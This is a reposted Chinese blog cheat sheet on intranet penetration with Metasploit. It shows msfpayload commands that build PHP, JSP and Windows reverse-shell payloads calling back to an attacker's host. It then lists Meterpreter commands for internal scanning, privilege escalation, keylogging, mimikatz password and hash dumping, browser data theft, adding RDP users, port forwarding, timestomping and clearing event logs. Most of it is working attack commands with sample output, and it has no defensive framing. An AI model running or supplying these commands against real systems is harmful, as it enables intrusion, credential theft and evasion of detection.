zoukankan      html  css  js  c++  java
  • 内网渗透中的反弹Shell与端口转发

    from:https://www.91ri.org/9367.html

    Web渗透中的反弹Shell与端口转发

    php需未禁用exec函数
    一:生成php反弹脚本
    msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php

    将文件传入shell中,在msf中开一个handler
    msf > use multi/handler
    msf exploit(handler) > set PAYLOAD php/reverse_php
    msf exploit(handler) > set LHOST x.x.x.x
    msf exploit(handler) > set LPORT 2333
    msf exploit(handler) > exploit

    此时访问re.php,即可反弹到本地一个shell

    当然,用nc直接监听端口也是可以的
    nc -lvv 2333
    其他可以考虑使用msf编码变形等,github也有这样一个脚本 https://github.com/keshy/cwg_tools/blob/master/php-reverse-shell.php 可供参考

    JSP
    msfpayload java/jsp_shell_reverse_tcp LHOST=x.x.x.x R > re.jsp

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
    msf exploit(handler) > set LHOST 192.168.10.1
    msf exploit(handler) > exploit

    内网扫描

    meterpreter > run autoroute -s 192.168.3.98  自动添加路由表
    meterpreter > background
    msf exploit(handler) > use auxiliary/scanner/portscan/tcp
    msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306
    PORTS => 80,8080,21,22,3389,445,1433,3306
    msf auxiliary(tcp) > set RHOSTS 192.168.3.1/24
    RHOSTS => 192.168.3.1/24
    msf auxiliary(tcp) > set THERADS 10
    THERADS => 10
    msf auxiliary(tcp) > exploit

    基本命令:

    background  # 让meterpreter处于后台模式  
    sessions -i number   # 与会话进行交互,number表示第n个session  
    quit  # 退出会话  
    shell # 获得命令行
    cat c:\boot.ini   # 查看文件内容  
    getwd # 查看当前工作目录 work directory  
    upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机上  
    download 0xfa.txt /root/Desktop/   # 下载文件到本机上  
    edit c:\boot.ini  # 编辑文件  
    search -d d:\www -f web.config # search 文件 
    ps # 查看当前活跃进程  
    migrate  pid # 将Meterpreter会话移植到进程数位pid的进程中  
    execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互  
    getpid # 获取当前进程的pid  
    kill pid # 杀死进程  
    getuid # 查看权限  
    sysinfo # 查看目标机系统信息,如机器名,操作系统等  
    getsystem #提权操作
    timestompc:/a.doc -c "10/27/2015 14:22:11" #修改文件的创建时间

    迁移进程

    migrate pid

    清理痕迹:)

    meterpreter > clearev

    获取敏感信息(Windows版本 Linux自行选择)

    run post/windows/gather/checkvm #是否虚拟机
    run post/windows/gather/enum_applications #获取安装软件信息
    run post/windows/gather/dumplinks   #获取最近的文件操作
    run post/windows/gather/enum_ie  #获取IE缓存
    run post/windows/gather/enum_chrome   #获取Chrome缓存
    run scraper                      #获取常见信息
    #保存在~/.msf4/logs/scripts/scraper/目录下

    meterpreter常见脚本

    arp_scanner

    利用arp进行存活主机扫描

    meterpreter > run arp_scanner -r 10.24.20.1/24
    [*] ARP Scanning 10.24.20.1/24
    [*] IP: 10.24.20.1 MAC 58:6a:b1:b4:a6:02
    [*] IP: 10.24.20.7 MAC 00:26:9e:8a:7d:a9
    [*] IP: 10.24.20.11 MAC c4:54:44:29:42:df

    autoroute

    可以添加,删除,显示路由表

    checkvm

    检测目标是否是虚拟机

    meterpreter > run checkvm

    [*] Checking if target is a Virtual Machine .....

    [*] It appears to be physical host.

    credcollect

    收集目标主机上的hash等凭证

    domain_list_gen

    获取域管理账户列表,并判断当前session所在用户是否在列表中

    duplicate

    再次产生payload,注入到其他进程或打开新进程并注入其中

    enum_firefox

    获取firefox中的信息,包括cooikie,历史纪录,书签等

    enum_chrome

    获取chrome中的信息

    event_manager

    可以查询和清理事件日志

    getgui

    可以很方便的开启远程桌面服务,添加用户,端口转发功能

    meterpreter > run getgui -h
    Windows Remote Desktop Enabler Meterpreter Script
    Usage: getgui -u <username> -p <password>
    Or: getgui -e

    OPTIONS:

    -e Enable RDP only.
    -f <opt> Forward RDP Connection.
    -h Help menu.
    -p <opt> The Password of the user to add.
    -u <opt> The Username of the user to add.

    get_local_subnets

    获得本地的子网

    get_pidgin_creds

    获取pidgin配置文件中的用户名和密码

    from:http://drops.wooyun.org/tips/9732

    from:http://drops.wooyun.org/tips/10146

    键盘记录

    meterpreter > keyscan_start
    Starting the keystroke sniffer...
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
    dir <Return> cd  <Ctrl>  <LCtrl>
    meterpreter > keyscan_stop
    Stopping the keystroke sniffer...

    获取明文密码

    meterpreter > getuid
    Server username: NT AUTHORITYSYSTEM    
    
    meterpreter > load mimikatz
    Loading extension mimikatz...success.
    meterpreter > msv
    [+] Running as SYSTEM
    [*] Retrieving msv credentials    
    
    meterpreter > kerberos
    [+] Running as SYSTEM
    [*] Retrieving kerberos credentials
    kerberos credentials
    ====================    
    
    meterpreter > mimikatz_command -f samdump::hashes
    Ordinateur : Testing
    BootKey    : 8c2c8d96e92a8ccfc407a1ca48531239    
    
    meterpreter > mimikatz_command -f sekurlsa::searchPasswords
    [0] { Croxy ; Testing ; hehe }
    [1] { test ; Testing ; test }

    端口转发

    meterpreter > portfwd add -l 1234 -p 3389 -r 10.42.0.54
    [*] Local TCP relay created: 0.0.0.0:8081 <-> 10.42.0.54:80
    将远程主机3389端口转发到本地1234端口上






    msfpayload windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=4444端口 x > /root/Desktop/1.exe

    依次输入以下命令 use exploit/multi/handler

    set PAYLOAD windows/meterpreter/reverse_top

    set LHOST 本机Ip
    exploit

  • 相关阅读:
    PHPLIB Template入门系列 4 模板嵌套
    jQuery 实例
    建立PHP的本地调试环境
    PHP缓存memcache简单应用
    PHP程序:虚拟域名服务DIY
    去掉网络共享的session
    C# 里EF 对Mysql DB更新,乱码
    sshd的log的位置
    cURL 访问https失败
    Eclipse中编辑properties文件的编码问题
  • 原文地址:https://www.cnblogs.com/lly-lly/p/5390864.html
Copyright © 2011-2022 走看看